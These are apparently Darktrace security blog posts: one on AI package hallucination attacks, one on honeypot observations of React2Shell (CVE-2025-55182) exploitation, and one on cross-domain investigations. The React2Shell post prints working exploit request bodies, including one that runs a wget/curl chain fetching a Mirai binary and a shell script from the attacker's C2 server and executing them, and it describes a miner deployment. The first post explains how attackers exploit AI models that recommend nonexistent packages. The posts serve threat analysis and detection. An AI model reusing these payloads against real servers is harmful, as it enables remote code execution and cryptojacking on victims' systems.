Blog
/
/
October 30, 2023

Exploring AI Threats: Package Hallucination Attacks

Learn how malicious actors exploit errors in generative AI tools to launch packet attacks. Read how Darktrace products detect and prevent these threats!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
30
Oct 2023

AI tools open doors for threat actors

On November 30, 2022, the free conversational language generation model ChatGPT was launched by OpenAI, an artificial intelligence (AI) research and development company. The launch of ChatGPT was the culmination of development ongoing since 2018 and represented the latest innovation in the ongoing generative AI boom and made the use of generative AI tools accessible to the general population for the first time.

ChatGPT is estimated to currently have at least 100 million users, and in August 2023 the site reached 1.43 billion visits [1]. Darktrace data indicated that, as of March 2023, 74% of active customer environments have employees using generative AI tools in the workplace [2].

However, with new tools come new opportunities for threat actors to exploit and use them maliciously, expanding their arsenal.

Much consideration has been given to mitigating the impacts of the increased linguistic complexity in social engineering and phishing attacks resulting from generative AI tool use, with Darktrace observing a 135% increase in ‘novel social engineering attacks’ across thousands of active Darktrace/Email™ customers from January to February 2023, corresponding with the widespread adoption of ChatGPT and its peers [3].

Less overall consideration, however, has been given to impacts stemming from errors intrinsic to generative AI tools. One of these errors is AI hallucinations.

What is an AI hallucination?

AI “hallucination” is a term which refers to the predictive elements of generative AI and LLMs’ AI model gives an unexpected or factually incorrect response which does not align with its machine learning training data [4]. This differs from regular and intended behavior for an AI model, which should provide a response based on the data it was trained upon.  

Why are AI hallucinations a problem?

Despite the term indicating it might be a rare phenomenon, hallucinations are far more likely than accurate or factual results as the AI models used in LLMs are merely predictive and focus on the most probable text or outcome, rather than factual accuracy.

Given the widespread use of generative AI tools in the workplace employees are becoming significantly more likely to encounter an AI hallucination. Furthermore, if these fabricated hallucination responses are taken at face value, they could cause significant issues for an organization.

Use of generative AI in software development

Software developers may use generative AI for recommendations on how to optimize their scripts or code, or to find packages to import into their code for various uses. Software developers may ask LLMs for recommendations on specific pieces of code or how to solve a specific problem, which will likely lead to a third-party package. It is possible that packages recommended by generative AI tools could represent AI hallucinations and the packages may not have been published, or, more accurately, the packages may not have been published prior to the date at which the training data for the model halts. If these hallucinations result in common suggestions of a non-existent package, and the developer copies the code snippet wholesale, this may leave the exchanges vulnerable to attack.

Research conducted by Vulcan revealed the prevalence of AI hallucinations when ChatGPT is asked questions related to coding. After sourcing a sample of commonly asked coding questions from Stack Overflow, a question-and-answer website for programmers, researchers queried ChatGPT (in the context of Node.js and Python) and reviewed its responses. In 20% of the responses provided by ChatGPT pertaining to Node.js at least one un-published package was included, whilst the figure sat at around 35% for Python [4].

Hallucinations can be unpredictable, but would-be attackers are able to find packages to create by asking generative AI tools generic questions and checking whether the suggested packages exist already. As such, attacks using this vector are unlikely to target specific organizations, instead posing more of a widespread threat to users of generative AI tools.

Malicious packages as attack vectors

Although AI hallucinations can be unpredictable, and responses given by generative AI tools may not always be consistent, malicious actors are able to discover AI hallucinations by adopting the approach used by Vulcan. This allows hallucinated packages to be used as attack vectors. Once a malicious actor has discovered a hallucination of an un-published package, they are able to create a package with the same name and include a malicious payload, before publishing it. This is known as a malicious package.

Malicious packages could also be recommended by generative AI tools in the form of pre-existing packages. A user may be recommended a package that had previously been confirmed to contain malicious content, or a package that is no longer maintained and, therefore, is more vulnerable to hijack by malicious actors.

In such scenarios it is not necessary to manipulate the training data (data poisoning) to achieve the desired outcome for the malicious actor, thus a complex and time-consuming attack phase can easily be bypassed.

An unsuspecting software developer may incorporate a malicious package into their code, rendering it harmful. Deployment of this code could then result in compromise and escalation into a full-blown cyber-attack.

Figure 1: Flow diagram depicting the initial stages of an AI Package Hallucination Attack.

For providers of Software-as-a-Service (SaaS) products, this attack vector may represent an even greater risk. Such organizations may have a higher proportion of employed software developers than other organizations of comparable size. A threat actor, therefore, could utilize this attack vector as part of a supply chain attack, whereby a malicious payload becomes incorporated into trusted software and is then distributed to multiple customers. This type of attack could have severe consequences including data loss, the downtime of critical systems, and reputational damage.

How could Darktrace detect an AI Package Hallucination Attack?

In June 2023, Darktrace introduced a range of DETECT™ and RESPOND™ models designed to identify the use of generative AI tools within customer environments, and to autonomously perform inhibitive actions in response to such detections. These models will trigger based on connections to endpoints associated with generative AI tools, as such, Darktrace’s detection of an AI Package Hallucination Attack would likely begin with the breaching of one of the following DETECT models:

  • Compliance / Anomalous Upload to Generative AI
  • Compliance / Beaconing to Rare Generative AI and Generative AI
  • Compliance / Generative AI

Should generative AI tool use not be permitted by an organization, the Darktrace RESPOND model ‘Antigena / Network / Compliance / Antigena Generative AI Block’ can be activated to autonomously block connections to endpoints associated with generative AI, thus preventing an AI Package Hallucination attack before it can take hold.

Once a malicious package has been recommended, it may be downloaded from GitHub, a platform and cloud-based service used to store and manage code. Darktrace DETECT is able to identify when a device has performed a download from an open-source repository such as GitHub using the following models:

  • Device / Anomalous GitHub Download
  • Device / Anomalous Script Download Followed By Additional Packages

Whatever goal the malicious package has been designed to fulfil will determine the next stages of the attack. Due to their highly flexible nature, AI package hallucinations could be used as an attack vector to deliver a large variety of different malware types.

As GitHub is a commonly used service by software developers and IT professionals alike, traditional security tools may not alert customer security teams to such GitHub downloads, meaning malicious downloads may go undetected. Darktrace’s anomaly-based approach to threat detection, however, enables it to recognize subtle deviations in a device’s pre-established pattern of life which may be indicative of an emerging attack.

Subsequent anomalous activity representing the possible progression of the kill chain as part of an AI Package Hallucination Attack could then trigger an Enhanced Monitoring model. Enhanced Monitoring models are high-fidelity indicators of potential malicious activity that are investigated by the Darktrace analyst team as part of the Proactive Threat Notification (PTN) service offered by the Darktrace Security Operation Center (SOC).

Conclusion

Employees are often considered the first line of defense in cyber security; this is particularly true in the face of an AI Package Hallucination Attack.

As the use of generative AI becomes more accessible and an increasingly prevalent tool in an attacker’s toolbox, organizations will benefit from implementing company-wide policies to define expectations surrounding the use of such tools. It is simple, yet critical, for example, for employees to fact check responses provided to them by generative AI tools. All packages recommended by generative AI should also be checked by reviewing non-generated data from either external third-party or internal sources. It is also good practice to adopt caution when downloading packages with very few downloads as it could indicate the package is untrustworthy or malicious.

As of September 2023, ChatGPT Plus and Enterprise users were able to use the tool to browse the internet, expanding the data ChatGPT can access beyond the previous training data cut-off of September 2021 [5]. This feature will be expanded to all users soon [6]. ChatGPT providing up-to-date responses could prompt the evolution of this attack vector, allowing attackers to publish malicious packages which could subsequently be recommended by ChatGPT.

It is inevitable that a greater embrace of AI tools in the workplace will be seen in the coming years as the AI technology advances and existing tools become less novel and more familiar. By fighting fire with fire, using AI technology to identify AI usage, Darktrace is uniquely placed to detect and take preventative action against malicious actors capitalizing on the AI boom.

Credit to Charlotte Thompson, Cyber Analyst, Tiana Kelly, Analyst Team Lead, London, Cyber Analyst

References

[1] https://seo.ai/blog/chatgpt-user-statistics-facts

[2] https://darktrace.com/news/darktrace-addresses-generative-ai-concerns

[3] https://darktrace.com/news/darktrace-email-defends-organizations-against-evolving-cyber-threat-landscape

[4] https://vulcan.io/blog/ai-hallucinations-package-risk?nab=1&utm_referrer=https%3A%2F%2Fwww.google.com%2F

[5] https://twitter.com/OpenAI/status/1707077710047216095

[6] https://www.reuters.com/technology/openai-says-chatgpt-can-now-browse-internet-2023-09-27/

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst

More in this series

No items found.

Blog

/

Network

/

December 11, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within HoursDefault blog imageDefault blog image

What is React2Shell?

CVE-2025-55182, also known as React2Shell is a vulnerability within React server components that allows for an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and ease of exploitability has led to threat actors opportunistically exploiting it within a matter of days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing for the monitoring of exploitation of the vulnerability in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows for Darktrace to deploy high-interaction, realistic honeypots, that appear as genuine deployments of vulnerable software to attackers.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provided known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts, roughly every hour.

When scanning, he spreader primarily targets port 3000, which is the default port for a NEXT.js server in a default or development configuration. It is possible the attacker is avoiding port 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to deploy several payloads by using wget (or curl if wget fails) into the /dev directory and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations to regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.
Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’ that match on a specific name. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script will checks for a process named “fghgf”. If it is not running, it will retrieve hxxp://89[.]144.31.18/nuts/lc and write it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script will the executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background, which is an XMRig miner.

The XMRig deployment script.
Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using  “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads their /proc/pid/exe path, which contains a copy of the original executable that was run. The ‘strings’ utility is run to output all valid ASCII strings found within the data and checks to see if contains either “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to the process to terminate it.

Additionally, it will run ‘ls –l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program:

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
 The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.

Darktrace observations in customer environments  

Following the public disclosure of CVE‑2025‑55182 on December, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell‑script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoint. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. These chain of events appear to identify this activity to be related to the malicious campaign of the exploitation of React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign to exploit the React2Shell exploit is not particularly sophisticated, it demonstrates that attackers can rapidly prototyping new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that patching vulnerabilities as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead, and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

/

December 8, 2025

Simplifying Cross Domain Investigations

simplifying cross domain thraetsDefault blog imageDefault blog image

Cross-domain gaps mean cross-domain attacks  

Organizations are built on increasingly complex digital estates. Nowadays, the average IT ecosystem spans across a large web of interconnected domains like identity, network, cloud, and email.  

While these domain-specific technologies may boost business efficiency and scalability, they also provide blind spots where attackers can shelter undetected. Threat actors can slip past defenses because security teams often use different detection tools in each realm of their digital infrastructure. Adversaries will purposefully execute different stages of an attack across different domains, ensuring no single tool picks up too many traces of their malicious activity. Identifying and investigating this type of threat, known as a cross-domain attack, requires mastery in event correlation.  

For example, one isolated network scan detected on your network may seem harmless at first glance. Only when it is stitched together with a rare O365 login, a new email rule and anomalous remote connections to an S3 bucket in AWS does it begin to manifest as an actual intrusion.  

However, there are a whole host of other challenges that arise with detecting this type of attack. Accessing those alerts in the respective on-premise network, SaaS and IaaS environments, understanding them and identifying which ones are related to each other takes significant experience, skill and time. And time favours no one but the threat actor.  

Anatomy of a cross domain attack
Figure 1: Anatomy of a cross domain attack

Diverse domains and empty grocery shelves

In April 2025, the UK faced a throwback to pandemic-era shortages when the supermarket giant Marks & Spencer (M&S) was crippled by a cyberattack, leaving empty shelves across its stores and massive disruptions to its online service.  

The threat actors, a group called Scattered Spider, exploited multiple layers of the organization’s digital infrastructure. Notably, the group were able to bypass the perimeter not by exploiting a technical vulnerability, but an identity. They used social engineering tactics to impersonate an M&S employee and successfully request a password reset.  

Once authenticated on the network, they accessed the Windows domain controller and exfiltrated the NTDS.dit file – a critical file containing hashed passwords for all users in the domain. After cracking those hashes offline, they returned to the network with escalated privileges and set their sights on the M&S cloud infrastructure. They then launched the encryption payload on the company’s ESXi virtual machines.

To wrap up, the threat actors used a compromised employee’s email account to send an “abuse-filled” email to the M&S CEO, bragging about the hack and demanding payment. This was possibly more of a psychological attack on the CEO than a technically integral part of the cyber kill chain. However, it revealed yet another one of M&S’s domains had been compromised.  

In summary, the group’s attack spanned four different domains:

Identity: Social engineering user impersonation

Network: Exfiltration of NTDS.dit file

Cloud: Ransomware deployed on ESXI VMs

Email: Compromise of user account to contact the CEO

Adept at exploiting nuance

This year alone, several high-profile cyber-attacks have been attributed to the same group, Scattered Spider, including the hacks on Victoria’s Secret, Adidas, Hawaiian Airlines, WestJet, the Co-op and Harrods. It begs the question, what has made this group so successful?

In the M&S attack, they showcased their advanced proficiency in social engineering, which they use to bypass identity controls and gain initial access. They demonstrated deep knowledge of cloud environments by deploying ransomware onto virtualised infrastructure. However, this does not exemplify a cookie-cutter template of attack methods that brings them success every time.

According to CISA, Scattered Spider typically use a remarkable variety of TTPs (tactics, techniques and procedures) across multiple domains to carry out their campaigns. From leveraging legitimate remote access tools in the network, to manipulating AWS EC2 cloud instances or spoofing email domains, the list of TTPs used by the group is eye-wateringly long. Additionally, the group reportedly evades detection by “frequently modifying their TTPs”.  

If only they had better intentions. Any security director would be proud of a red team who not only has this depth and breadth of domain-centric knowledge but is also consistently upskilling.  

Yet, staying ahead of adversaries who seamlessly move across domains and fluently exploit every system they encounter is just one of many hurdles security teams face when investigating cross-domain attacks.  

Resource-heavy investigations

There was a significant delay in time to detection of the M&S intrusion. News outlet BleepingComputer reported that attackers infiltrated the M&S network as early as February 2025. They maintained persistence for weeks before launching the attack in late April 2025, indicating that early signs of compromise were missed or not correlated across domains.

While it’s unclear exactly why M&S missed the initial intrusion, one can speculate about the unique challenges investigating cross-domain attacks present.  

Challenges of cross-domain investigation

First and foremost, correlation work is arduous because the string of malicious behaviour doesn’t always stem from the same device.  

A hypothetical attack could begin with an O365 credential creating a new email rule. Weeks later, that same credential authenticates anomalously on two different devices. One device downloads an .exe file from a strange website, while the other starts beaconing every minute to a rare external IP address that no one else in the organisation has ever connected to. A month later, a third device downloads 1.3 GiB of data from a recently spun up S3 bucket and gradually transfers a similar amount of data to that same rare IP.

Amid a sea of alerts and false positives, connecting the dots of a malicious attack like this takes time and meticulous correlation. Factor in the nuanced telemetry data related to each domain and things get even more complex.  

An analyst who specialises in network security may not understand the unique logging formats or API calls in the cloud environment. Perhaps they are proficient in protecting the Windows Active Directory but are unfamiliar with cloud IAM.  

Cloud is also an inherently more difficult domain to investigate. With 89% of organizations now operating in multi-cloud environments time must be spent collecting logs, snapshots and access records. Coupled with the threat of an ephemeral asset disappearing, the risk of missing a threat is high. These are some of the reasons why research shows that 65% of organisations spend 3-5 extra days investigating cloud incidents.  

Helpdesk teams handling user requests over the phone require a different set of skills altogether. Imagine a threat actor posing as an employee and articulately requesting an urgent password reset or a temporary MFA deactivation. The junior Helpdesk agent— unfamiliar with the exception criteria, eager to help and feeling pressure from the persuasive manipulator at the end of the phoneline—could easily fall victim to this type of social engineering.  

Empowering analysts through intelligent automation

Even the most skilled analysts can’t manually piece together every strand of malicious activity stretching across domains. But skill alone isn’t enough. The biggest hurdle in investigating these attacks often comes down to whether the team have the time, context, and connected visibility needed to see the full picture.

Many organizations attempt to bridge the gap by stitching together a patchwork of security tools. One platform for email, another for endpoint, another for cloud, and so on. But this fragmentation reinforces the very silos that cross-domain attacks exploit. Logs must be exported, normalized, and parsed across tools a process that is not only error-prone but slow. By the time indicators are correlated, the intrusion has often already deepened.

That’s why automation and AI are becoming indispensable. The future of cross-domain investigation lies in systems that can:

  • Automatically correlate activity across domains and data sources, turning disjointed alerts into a single, interpretable incident.
  • Generate and test hypotheses autonomously, identifying likely chains of malicious behaviour without waiting for human triage.
  • Explain findings in human terms, reducing the knowledge gap between junior and senior analysts.
  • Operate within and across hybrid environments, from on-premise networks to SaaS, IaaS, and identity systems.

This is where Darktrace transforms alerting and investigations. Darktrace’s Cyber AI Analyst automates the process of correlation, hypothesis testing, and narrative building, not just within one domain, but across many. An anomalous O365 login, a new S3 bucket, and a suspicious beaconing host are stitched together automatically, surfacing the story behind the alerts rather than leaving it buried in telemetry.

How threat activity is correlated in Cyber AI Analyst
Figure 2: How threat activity is correlated in Cyber AI Analyst

By analyzing events from disparate tools and sources, AI Analyst constructs a unified timeline of activity showing what happened, how it spread, and where to focus next. For analysts, it means investigation time is measured in minutes, not days. For security leaders, it means every member of the SOC, regardless of experience, can contribute meaningfully to a cross-domain response.

Figure 3: Correlation showcasing cross domains (SaaS and IaaS) in Cyber AI Analyst

Until now, forensic investigations were slow, manual, and reserved for only the largest organizations with specialized DFIR expertise. Darktrace / Forensic Acquisition & Investigation changes that by leveraging the scale and elasticity of the cloud itself to automate the entire investigation process. From capturing full disk and memory at detection to reconstructing attacker timelines in minutes, the solution turns fragmented workflows into streamlined investigations available to every team.

What once took days now takes minutes. Now, forensic investigations in the cloud are faster, more scalable, and finally accessible to every security team, no matter their size or expertise.

Continue reading
About the author
Benjamin Druttman
Cyber Security AI Technical Instructor
Your data. Our AI.
Elevate your network security with Darktrace AI